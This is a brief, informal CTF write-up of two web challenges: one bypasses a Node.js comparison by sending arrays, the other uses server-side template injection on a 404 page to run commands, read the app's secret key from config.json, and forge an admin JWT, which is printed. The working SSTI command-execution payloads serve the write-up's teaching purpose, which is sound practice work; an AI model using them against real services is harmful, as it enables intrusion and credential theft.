SuSec CTF write-up

2020. 3. 17. 17:34


2018년 @Yeouido Hangang Park, Seoul, Korea


 Sorry for my bad English foreigners lol :0






 We can get the source which use nodejs express engine. There's some mechanism which compare 'first' and 'second' in post method. As send Array in 'first' and 'second', you can get the flag!








 We can access to very simple web service. You can Login, get Flag, and change the Theme of the service. After many tries in JWT Token Attack, I found the SSTI at the 404 page. 




 As soon as I found this, I really screamed. for real. It was a waste of time to try to attack JWT Authentication. Just keep going on trying SSTI.




[*] url :{{config.__class__.__init__.__globals__['os'].popen('ls -al').read()}}


Okay, we can use ssti to run the command. 




[*]{{config.__class__.__init__.__globals__['os'].popen('cat config.json').read()}}


I got the secret key of this microservice. Just apply in your jwt token as admin privilige. 




[*] payload : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQyNzkxMjAsIm5iZiI6MTU4NDI3OTEyMCwianRpIjoiNzEwZTJiMjQtZjUzYy00NmQ1LWFjMTgtMTMwODUyNDllNWNhIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.s3ppGGNMSIQc4HBbhBFb5TjxdBBqVAo0jKD_nhH8RBY




haha we got the flag !!